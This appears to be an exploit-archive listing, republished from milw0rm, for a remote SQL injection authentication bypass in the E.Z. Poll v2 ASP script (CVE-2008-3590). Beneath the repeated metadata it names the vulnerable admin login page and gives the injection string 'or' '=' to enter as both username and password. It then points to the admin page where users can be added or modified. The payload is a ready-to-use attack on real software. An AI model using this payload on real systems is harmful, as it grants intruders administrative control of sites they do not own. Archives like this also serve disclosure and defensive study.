E.Z. Poll 2 - Authentication Bypass
| EKU-ID: 15166 | CVE: OSVDB-47325;CVE-2008-3590 | OSVDB-ID: |
| Author: t0fx | Published: 2008-12-01 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 15166 | CVE: OSVDB-47325;CVE-2008-3590 | OSVDB-ID: |
| Author: t0fx | Published: 2008-12-01 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Description: ************* ***************** ************* ******************* E.Z. Poll <= v.2 script Remote SQL injection Exploit discovered by t0fx aka xtof69 vendor : E.Z. ************* ***************** ************* ******************* vulnerable page : http://www.site.com/admin/login.asp exploit : Username : 'or' '=' Password : 'or' '=' Add, modify user : /admin/admin-users.asp # milw0rm.com [2008-12-01]